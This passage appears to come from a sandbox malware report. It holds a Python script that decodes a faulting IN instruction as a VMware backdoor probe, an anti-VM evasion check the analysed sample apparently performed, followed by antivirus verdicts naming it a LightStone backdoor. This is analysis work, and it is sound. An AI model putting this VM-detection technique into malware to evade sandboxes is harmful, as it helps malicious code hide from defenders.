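The register dump above carries everything needed to recognise the check. The following script is an added example, not part of the sandbox report: it decodes such an exception record into the backdoor probe it represents. SAMPLE_EXCEPTION is constructed from the report's own fields (register values are the decimal numbers the sandbox printed); the small command table is taken from the VMware guest tools' backdoor definitions (open-vm-tools backdoor_def.h) and reproduces only a few entries; the helper names and the verdict wording are mine.

```python
"""Decode a sandbox __exception__ record on an IN/OUT instruction into the
VMware backdoor probe it represents. Added example, not part of the report.
SAMPLE_EXCEPTION is constructed from the report's own exception fields."""
import struct

VMWARE_MAGIC = 0x564D5868          # "VMXh" in eax selects the backdoor
VMWARE_PORT = 0x5658               # "VX": I/O port 0x5658 in dx
STATUS_PRIVILEGED_INSTRUCTION = 0xC0000096
# Subset of the backdoor command numbers (open-vm-tools backdoor_def.h).
BACKDOOR_COMMANDS = {0x0A: "GETVERSION", 0x13: "GETUUID", 0x14: "GETMEMSIZE", 0x1E: "MESSAGE"}

SAMPLE_EXCEPTION = {  # constructed from the report
    "instruction": "in eax, dx",
    "instruction_r": "ed e9 ae 84 02 00 77 00 a6 31 d6 b4 fd ff 50 00",
    "exception_code": 0xC0000096,
    "address": 0x1682814,
    "offset": 6105108,
    "registers": {"eax": 1447909480, "edx": 22104, "ecx": 10,
                  "ebx": 2256917605, "esi": 20575618, "edi": 20920013},
}


def decode_exception(rec):
    """Return what the faulting instruction was doing and what the fault means."""
    regs = rec["registers"]
    eax, edx, ecx = regs["eax"], regs["edx"], regs["ecx"]
    is_port_io = rec["instruction"].split()[0] in ("in", "out")
    opcode = bytes.fromhex(rec["instruction_r"].replace(" ", ""))[0]  # 0xED = IN EAX, DX
    trapped = rec["exception_code"] == STATUS_PRIVILEGED_INSTRUCTION
    probe = is_port_io and eax == VMWARE_MAGIC and (edx & 0xFFFF) == VMWARE_PORT
    cmd = ecx & 0xFFFF  # low word is the command; the high word is command-specific
    if probe and trapped:
        verdict = "VMware backdoor probe; the fault means no VMware hypervisor intercepted the port"
    elif probe:
        verdict = "VMware backdoor probe with an unexpected exception code"
    else:
        verdict = "privileged instruction, not the VMware backdoor"
    return {
        "opcode": opcode,
        "magic_ascii": struct.pack(">I", eax).decode("ascii", "replace"),
        "port": edx & 0xFFFF,
        "command": BACKDOOR_COMMANDS.get(cmd, "0x%02x" % cmd),
        "is_vmware_backdoor_probe": probe,
        "trapped": trapped,
        "module_base": rec["address"] - rec["offset"],
        "verdict": verdict,
    }


if __name__ == "__main__":
    for k, v in decode_exception(SAMPLE_EXCEPTION).items():
        print("%-26s %s" % (k, hex(v) if isinstance(v, int) and not isinstance(v, bool) else v))
```

The same decoder applies to any sandbox that records the faulting instruction and registers; the two constants are what distinguish this probe from an unrelated privileged-instruction crash, and the computed module base (0x10b0000 here) is what lets the offset be mapped back into the unpacked binary later.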
Bkav W32.AIDetect.malware1
Lionic Trojan.Win32.Malicious.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.37284072
ALYac Trojan.GenericKD.37284072
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Backdoor:MSIL/LightStone.80427b74
K7GW Riskware ( 0040eff71 )
CrowdStrike win/malicious_confidence_90% (W)
Arcabit Trojan.Generic.D238E8E8
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Generik.NCZVMOZ
APEX Malicious
Paloalto generic.ml
Kaspersky Backdoor.MSIL.LightStone.drj
BitDefender Trojan.GenericKD.37284072
NANO-Antivirus Virus.Win32.Gen-Crypt.ccnc
Avast Win32:Malware-gen
Ad-Aware Trojan.GenericKD.37284072
Sophos Mal/Generic-R + Mal/FakeMS-X
DrWeb Trojan.Siggen14.43856
TrendMicro TROJ_GEN.R002C0RGM21
McAfee-GW-Edition BehavesLike.Win32.Generic.wc
MaxSecure Trojan.Malware.300983.susgen
FireEye Generic.mg.f31199c1fccb1fe6
Emsisoft Trojan.GenericKD.37284072 (B)
Ikarus Trojan.SuspectCRC
Webroot W32.Trojan.GenKD
Avira HEUR/AGEN.1135447
MAX malware (ai score=100)
Kingsoft Win32.Heur.KVMH008.a.(kcloud)
Gridinsoft Trojan.Heur!.032100A1
Microsoft Trojan:Win32/Spy.BYF!MTB
ZoneAlarm Backdoor.MSIL.LightStone.drj
GData Trojan.GenericKD.37284072
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Generic.R433010
McAfee Artemis!F31199C1FCCB
VBA32 BScope.TrojanDownloader.MSIL.Pasta
Malwarebytes Trojan.Crypt
TrendMicro-HouseCall TROJ_GEN.R002C0RGM21
Rising Trojan.Generic@ML.99 (RDML:J+cwC0zvb3Rk3uOeBbXyNQ)
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_100%
Fortinet W32/PossibleThreat
BitDefenderTheta AI:Packer.E4FAF2611F
AVG Win32:Malware-gen
Cybereason malicious.1fccb1